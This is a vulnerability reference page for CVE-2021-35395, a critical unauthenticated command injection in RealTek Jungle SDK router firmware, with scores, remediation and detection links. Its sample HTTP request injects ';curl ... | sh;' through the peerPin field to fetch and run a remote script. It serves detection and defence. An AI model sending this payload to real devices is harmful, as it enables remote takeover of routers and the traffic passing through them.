🔙 목록으로 돌아가기

CVE-2021-35395: RealTek Jungle SDK - Arbitrary Command Injection

TitleRealTek Jungle SDK - Arbitrary Command Injection
Authorking-alexander
SeverityCritical
ImpactUnauthenticated attackers can execute arbitrary system commands via command injection in the peerPin parameter, leading to complete router compromise and control over network traffic.
RemediationApply the latest security patches or updates provided by RealTek to fix the vulnerability.
CVSS Score9.8
EPSS Score0.93663
CVE IDCVE-2021-35395
Tags cve2021 cve realtek rce kev vkev vuln

🔍 Vulnerability Description

There is a command injection vulnerability on the “formWsc” page of the management interface. Successful exploitation of this vulnerability could lead to remote code execution and compromise of the affected system.

🌐 HTTP Request

POST /goform/formWsc HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15
Connection: close
Content-Length: 172
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;curl http://d5jnuhhle0o4hc3h3t2g365htimoys5hi.oast.me | sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin=

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-35395.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-35395.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A